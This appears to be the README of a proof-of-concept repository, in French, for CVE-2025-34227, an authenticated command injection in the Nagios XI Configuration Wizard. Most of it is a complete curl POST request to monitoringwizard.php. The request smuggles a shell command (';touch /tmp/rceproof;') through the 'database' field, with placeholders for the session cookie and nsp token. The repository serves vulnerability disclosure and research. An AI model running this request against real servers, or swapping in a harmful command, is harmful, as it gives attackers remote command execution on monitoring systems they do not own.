
Simple dépôt de preuve de concept pour CVE-2025-34227 Nagios XI injection de commande authentifiée dans Configuration Wizard
Configuration WizardDépôt de preuve de concept simple pour CVE-2025-34227, une injection de commande authentifiée dans Nagios XI -> Configuration Wizard
Article complet ici: https://theyhack.me/CVE-2025-34227-Nagios-XI-Wizard-Command-Injection/
curlLa charge utile ci-dessous se trouve dans le paramètre database : ;touch /tmp/rceproof;.
Après vous être authentifié, ajoutez votre identifiant de session Cookie: nagiosxi= et votre valeur nsp au corps de la requête POST :
$ curl -s \
-H 'Cookie: nagiosxi=<your-session-id-here>' \
--data 'update=1&nsp=<your-nsp-value-here>&step=3&nextstep=5&wizard=mysqlquery&tpl=&hostname=localhost&operation=&selectedhostconfig=&services_serial=&serviceargs_serial=&config_serial=&ip_address=127.0.0.1&port=3306&username=test&password=test&database=information_schema%3Btouch+/tmp/rceproof%3B&queryname=curl+RCE+service&query=SELECT+1&warning=50&check_interval=1&retry_interval=1&critical=200&finishButton=' \
http://192.168.122.9/nagiosxi/config/monitoringwizard.php